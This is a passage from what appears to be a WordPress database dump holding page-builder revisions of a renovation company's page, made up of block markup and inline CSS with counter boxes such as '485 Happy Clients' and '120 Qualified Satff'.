margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1e9b3b34-822d-44f1-8727-46320a6bc479\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"95c0e54f-01b3-4b36-831f-1ac481c6ea4e\"} -->\n<style type=\"text/css\"> .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ef45fcde-982c-4313-909b-e20332b97d17\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','We take pride in  our work','','inherit','closed','closed','','166-revision-v1','','','2022-08-23 18:46:06','2022-08-23 18:46:06','',166,'https://cteisys.com/?p=451',0,'revision','',0),(341,1,'2021-05-27 05:16:14','2021-05-27 05:16:14','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f7052ff3-5ccb-4b32-83ca-ae41e125b40b\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor\":\"#ffffff\",\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f7052ff3-5ccb-4b32-83ca-ae41e125b40b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"33b148f3-477b-4e8c-84a0-09704c07df3d\"} -->\n<style type=\"text/css\"> .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-33b148f3-477b-4e8c-84a0-09704c07df3d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-33b148f3-477b-4e8c-84a0-09704c07df3d skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"91abe0d3-f41f-4672-9b32-ef0860259c26\"} -->\n<style type=\"text/css\"> .block-91abe0d3-f41f-4672-9b32-ef0860259c26 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91abe0d3-f41f-4672-9b32-ef0860259c26 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91abe0d3-f41f-4672-9b32-ef0860259c26 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91abe0d3-f41f-4672-9b32-ef0860259c26 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91abe0d3-f41f-4672-9b32-ef0860259c26 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91abe0d3-f41f-4672-9b32-ef0860259c26\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"13a1b6a8-ddc8-48d6-94db-44740f52e994\"} -->\n<style type=\"text/css\"> .block-13a1b6a8-ddc8-48d6-94db-44740f52e994 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-13a1b6a8-ddc8-48d6-94db-44740f52e994 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-13a1b6a8-ddc8-48d6-94db-44740f52e994 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-13a1b6a8-ddc8-48d6-94db-44740f52e994 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-13a1b6a8-ddc8-48d6-94db-44740f52e994 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-13a1b6a8-ddc8-48d6-94db-44740f52e994\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a19622af-a9ea-4656-b081-4379c93e441d\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#253242\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a19622af-a9ea-4656-b081-4379c93e441d .responsive-heading-desc-text 